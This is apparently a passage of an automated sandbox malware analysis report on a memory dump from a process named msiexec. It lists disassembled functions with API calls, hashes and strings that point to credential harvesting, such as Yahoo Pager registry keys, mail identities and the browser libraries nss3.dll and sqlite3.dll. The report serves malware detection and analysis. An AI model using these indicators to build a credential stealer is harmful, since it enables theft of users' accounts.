                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                        • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3503910906-0
                                                                                                        • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                        • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                        • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                        • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                        Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040C922
                                                                                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                        • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$MenuPostSendStringmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3798638045-0
                                                                                                        • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                        • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                        • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                        • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                        Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                          • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                        • strlen.MSVCRT ref: 0040B60B
                                                                                                        • atoi.MSVCRT(?), ref: 0040B619
                                                                                                        • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                        • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 4107816708-0
                                                                                                        • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                        • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                        • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                        • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                        Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                        • _gmtime64.MSVCRT ref: 00411437
                                                                                                        • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                        • strftime.MSVCRT ref: 00411476
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                        • String ID:
                                                                                                        • API String ID: 1886415126-0
                                                                                                        • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                        • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                        • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                        • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                        Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strlen
                                                                                                        • String ID: >$>$>
                                                                                                        • API String ID: 39653677-3911187716
                                                                                                        • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                        • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                        • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                        • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                        Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                        • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                        • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                        • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                        • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                        Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcmpi
                                                                                                        • String ID: C@$mail.identity
                                                                                                        • API String ID: 1439213657-721921413
                                                                                                        • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                        • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                        • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                        • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                        Function 00444551 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00444573
                                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValuememset
                                                                                                        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                        • API String ID: 3363972335-1703613266
                                                                                                        • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                        • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                        • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                        • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                        Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00406640
                                                                                                          • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                        • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                        • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset$memcmp
                                                                                                        • String ID: Ul@
                                                                                                        • API String ID: 270934217-715280498
                                                                                                        • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                        • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                        • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                        • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                        Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                        Strings
                                                                                                        • recovered %d pages from %s, xrefs: 004188B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                        • String ID: recovered %d pages from %s
                                                                                                        • API String ID: 985450955-1623757624
                                                                                                        • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                        • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                        • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                        • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                        Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _ultoasprintf
                                                                                                        • String ID: %s %s %s
                                                                                                        • API String ID: 432394123-3850900253
                                                                                                        • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                        • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                        • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                        • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                        Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                        • sprintf.MSVCRT ref: 0040909B
                                                                                                          • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                          • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                          • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                          • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                          • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                        • String ID: menu_%d
                                                                                                        • API String ID: 1129539653-2417748251
                                                                                                        • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                        • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                        • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                        • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                        Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _msizerealloc
                                                                                                        • String ID: failed memory resize %u to %u bytes
                                                                                                        • API String ID: 2713192863-2134078882
                                                                                                        • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                        • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                        • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                        • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                        Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                        • strrchr.MSVCRT ref: 00409808
                                                                                                        • _mbscat.MSVCRT ref: 0040981D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleName_mbscatstrrchr
                                                                                                        • String ID: _lng.ini
                                                                                                        • API String ID: 3334749609-1948609170
                                                                                                        • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                        • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                        • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                        • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                        Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                        • _mbscat.MSVCRT ref: 004070FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscat$_mbscpystrlen
                                                                                                        • String ID: sqlite3.dll
                                                                                                        • API String ID: 1983510840-1155512374
                                                                                                        • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                        • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                        • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                        • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                        Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString
                                                                                                        • String ID: A4@$Server Details
                                                                                                        • API String ID: 1096422788-4071850762
                                                                                                        • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                        • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                        • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                        • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                        Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                        • memset.MSVCRT ref: 0042C932
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 438689982-0
                                                                                                        • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                        • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                        • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                        • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                        Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.MSVCRT ref: 0040849A
                                                                                                        • memset.MSVCRT ref: 004084D2
                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,67CB7B60,?,00000000), ref: 0040858F
                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,67CB7B60,?,00000000), ref: 004085BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3110682361-0
                                                                                                        • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                        • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                        • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                        • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                        Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                        • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                        • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                        • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8